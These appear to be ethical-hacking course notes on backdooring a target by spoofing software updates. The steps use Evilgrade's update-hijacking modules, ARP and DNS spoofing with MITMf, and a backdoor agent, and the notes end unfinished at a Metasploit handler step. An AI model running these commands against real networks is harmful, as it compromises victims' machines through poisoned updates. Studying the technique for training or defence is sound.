CLIENT SIDE ATTACKS

Backdoor delivery method1 - Spoofing Software Updates

Fake an update for an already installed program.

Install the backdoor instead of the update.

Require DNS spoofing Evilgrade(a server to serve the update).

1. Download and install Evilgrade.

https://github.com/infobyte/evilgrade

git clone https://github.com/infobyte/evilgrade.git

cd evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML

 

 

 

 

 

 

 

 

 OR

apt-get install isr-evilgrade

 

 

 

2. Start Evilgrade. 

evilgrade

 

 

 

 

3. Check programs that can be hijacked.

show modules

 

List of modules:
===============

acer
allmynotes
amsn
appleupdate
appstore
apptapp
apt
asus
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
fsecure_client
getjar
gom
googleanalytics
growl
inteldriver
isopen
istat
itunes
jdtoolkit
jet
jetphoto
keepass
lenovo
lenovoapk
lenovofirmware
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openbazaar
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
port
quicktime
safari
samsung
skype
soapui
sparkle
sparkle2
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
timedoctor
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 80 modules available.

 

4. Select one

configure [module]

 

5. Set backdoor location.

set agent [agent location]

 

 

 

 

6. Start server

start

 

 

 

7. Start DNS spoofing and handler.

 Modify the mitmf.conf file.

 Start MITMF:

pyton2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.21 -i eth0 --dns

 

 Msf:

 

 

Install the update on target machine. Then you can run the backdoor program>>